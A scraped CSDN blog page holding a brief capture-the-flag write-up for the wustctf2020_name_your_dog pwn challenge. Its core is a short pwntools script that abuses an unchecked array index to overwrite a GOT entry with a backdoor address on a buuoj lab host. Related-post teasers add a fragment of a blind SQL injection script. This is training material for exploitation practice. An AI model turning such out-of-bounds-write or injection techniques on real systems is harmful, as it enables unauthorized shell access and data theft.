wustctf2020_name_your_dog

最新推荐文章于 2024-04-15 07:55:29 发布
最新推荐文章于 2024-04-15 07:55:29 发布
阅读量3.1k 收藏
点赞数
分类专栏: PWN 文章标签: 安全 学习 unix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123993835
版权
本文探讨了在代码中由于数组越界检查缺失,可能导致的安全漏洞,展示了如何利用此漏洞在远程服务器上执行shell命令。通过pwn库实例,演示了如何构造payload利用0x080485CB地址实现shell权限获取。
摘要由CSDN通过智能技术生成

这里存在数组越界,没有进行检查,所以我们可以任意地址写,这里写got为shell即可

from pwn import *
p = remote("node4.buuoj.cn",27085)

shell = 0x080485CB
p.sendlineafter(">",'-7')
p.sendlineafter("Give your name plz: ",p32(shell))
p.interactive()

 

cut_maize
关注
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 680
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
Linux 内核启动信息的打印 --- dev_driver_string函数/dev_name函数
linux
06-14 4740
内核启动时,常会打印出一些信息:开头是 "驱动模块的名字: + 具体的信息"如:在运行的linux系统设备上,插入鼠标,就会打印出鼠标的相关信息;[ 402.134068] input: USB Optical Mouse as /devices/soc0/soc/2100000.aips-bus/2184000.usb/ci_hdrc.0/usb1/1-1/1-1:1.0/0003:0461:...
BUUCTF之“wustctf2020_name_your_dog
Probeginner的博客
12-22 213
利用两次输入覆盖got.plt表间接执行后门函数
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 341
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got表很近, 意味着我们可以修改
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got表)
mcmuyanga的博客
03-18 506
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
wustctf2020_name_your_dog(数组越界劫持got)
m0_51251108的博客
11-05 277
wustctf2020_name_your_dog: 有一道类似的叫name_your_cat,是数组越界 逆向分析: 主界面 NameWhich函数: 根本没检查边界,num我们随便取,依旧数组越界 后门 具体步骤: got表可写,got表就在dog上面不远处,我们能改__isoc99_scanf,printf printf=0x0804A00C __isoc99_scanf=0x0804A028 dog=0x804a060 由于与print相差不是8的倍数,我们选scanf num填(0x28
大白话详解Python中if __name__ == ‘__main__‘
热门推荐
Miracle.Zhao的博客
02-25 1万+
该文章转自地址, 感觉特别好,转载收藏一下,以备及时查阅。 1 if __name__ == '__main__' 1.1 摘要 通俗的理解__name__ == '__main__':假如你叫小明.py,在朋友眼中,你是小明(__name__ == '小明');在你自己眼中,你是你自己(__name__ == '__main__')。 if __name__ == '__main__'的意思是:当.py文件被直接运行时,if __name__ == '__main__'之下的代码块将被运行;当..
升级MySQL5.7.24时报错提示mysql/innodb_table_stats has length mismatch in the column name table_name.的解决方法
hnyxwl_liufan的博客
05-09 5726
MySQL5.7.24 下 报错提示innodb_table_stats 解决方法5.7.17升级致5.7.24后日志提示报错:新老数据正常表结构:mysql/innodb_index_stats和innodb_tables_stats中table_name字段解决办法mysql官方文档5.7.23的 Release Notes 如下:地址: 5.7.17升级致5.7.24后日志提示报错: 最近在...
nginx配置文件中server_name的作用
ergouy's blog
03-07 9585
最近学习了Nginx,做一些必要的笔记,一来是对自己学习的知识的巩固,二来对有同样问题的人有参考作用 文章目录一 作用二 匹配顺序三 举例四 总结 一 作用    server name 为虚拟服务器的识别路径。因此不同的域名会通过请求头中的HOST字段,匹配到特定的server块,转发到对应的应用服务器中去。    当我们通过hosts文件指定IP...
CTFd:所需的CTF
02-05
什么是CTFd? CTFd是一个Capture Flag框架,专注于易用性和可定制性。 它包含运行CTF所需的一切,并且很容易使用插件和主题进行自定义。 产品特点 通过管理界面创建自己的挑战,类别,提示和标志 动态计分挑战 解锁挑战支持 挑战插件架构,以创建自己的自定义挑战 基于静态和正则表达式的标志自定义标志插件 解锁提示 文件上传到服务器或与Amazon S3兼容的后端 限制挑战尝试并隐藏挑战 自动暴力保护 个人和团体比赛让用户自己玩游戏还是组队一起玩 带自动领带解析度的记分牌 隐藏公众得分 在特定时间冻结分数 评分表比较前十名团队和团队进度图 降价内容管理系统 SMTP + Mailg
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
wustctf2020_name_your_cat
z1r0的博客
01-17 675
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
【Web】WUSTCTF 2020 部分题解
最新发布
uuzeray的博客
04-15 433
1/**/UnIon/**/select/**/1,2,3# //回显3。改Content-Type,文件内容加个GIF89a魔数。访问/fAke_f1agggg.php。随便注册个账号,更换头像功能存在文件上传。抓包看响应头看到/f14g.php。第一反应搜CVE,但没搜到有用的。过滤了空格,测出来有sql注入点。简单的bypass,不解释了。直接读环境变量拿到flag。访问/robots.txt。访问/f14g.php。可以搜索找到上传的路径。连接蚁剑,发现权限不够。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 452
buuctf-pwn 001-016题wp
WUST-CTF2020-WP
夏日 の blog
03-29 5397
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 603
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
WUST-CTF2020 writeup
abtgu的博客
04-02 1584
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
Oracle数据库service_name参数详解
"Oracle数据库中的`service_name`参数是一个关键配置项,用于标识数据库实例的网络服务名。在Oracle环境中,`service_name`是客户端连接到数据库实例时使用的,它描述了数据库服务在网络上的身份。`service_name`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值